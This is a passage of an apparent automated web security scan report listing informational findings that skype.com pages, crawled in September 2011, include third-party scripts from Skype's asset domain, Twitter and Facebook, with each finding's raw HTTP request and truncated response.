...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.857. http://www.skype.com/intl/en/features/allfeatures/skype-wifi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-wifi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/skype-wifi HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60268


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.858. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/skype-wifi/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/skype-wifi/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60268


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.859. http://www.skype.com/intl/en/features/allfeatures/sms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/sms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/sms HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:44 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 63205


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>SMS - Send Text Messages to Mobiles Online - Skype Features</title>
   <meta name="descriptio
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.860. http://www.skype.com/intl/en/features/allfeatures/sms/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/sms/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/sms/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 63205


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>SMS - Send Text Messages to Mobiles Online - Skype Features</title>
   <meta name="descriptio
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.861. http://www.skype.com/intl/en/features/allfeatures/video-call  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/video-call

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/video-call HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46387


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Calls - Free Video Calls - Skype</title>
   <meta name="description" content="Free vide
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.862. http://www.skype.com/intl/en/features/allfeatures/video-call/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/video-call/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/video-call/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 46387


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Calls - Free Video Calls - Skype</title>
   <meta name="description" content="Free vide
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.863. http://www.skype.com/intl/en/features/allfeatures/voicemail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/voicemail

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/voicemail HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:44 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42707


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Voicemail - Online Voicemail - Skype</title>
   <meta name="description" content="Never
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.864. http://www.skype.com/intl/en/features/allfeatures/voicemail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/features/allfeatures/voicemail/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/features/allfeatures/voicemail/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42707


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Voicemail - Online Voicemail - Skype</title>
   <meta name="description" content="Never
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.865. http://www.skype.com/intl/en/get-skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40734


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Get Skype - Download for free</title>
   <meta name="description" content="Make Skype a part
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.866. http://www.skype.com/intl/en/get-skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40734


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Get Skype - Download for free</title>
   <meta name="description" content="Make Skype a part
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.867. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/click-to-call

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/click-to-call HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42931


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Click to call - Make online calls directly from your browser - Skype</title>
   <meta name="d
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.868. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/click-to-call/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/click-to-call/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42931


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Click to call - Make online calls directly from your browser - Skype</title>
   <meta name="d
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.869. http://www.skype.com/intl/en/get-skype/on-your-computer/linux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/linux

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/linux HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49359


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download the latest version of Skype for Linux</title>
   <meta name="description" content="D
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.870. http://www.skype.com/intl/en/get-skype/on-your-computer/linux/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/linux/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/linux/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49359


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Download the latest version of Skype for Linux</title>
   <meta name="description" content="D
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.871. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/macosx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/macosx HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 57523


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.3 for Mac OS X - Now with HD Video Calls - Skype</title>
   <meta name="description"
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.872. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/macosx/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/macosx/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 57523


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.3 for Mac OS X - Now with HD Video Calls - Skype</title>
   <meta name="description"
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.873. http://www.skype.com/intl/en/get-skype/on-your-computer/windows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/windows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/windows HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54812


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype 5.5 for Windows - Download the latest version of Skype and get free computer calls</ti
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.874. http://www.skype.com/intl/en/get-skype/on-your-computer/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/get-skype/on-your-computer/windows/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/get-skype/on-your-computer/windows/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:37:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 54812


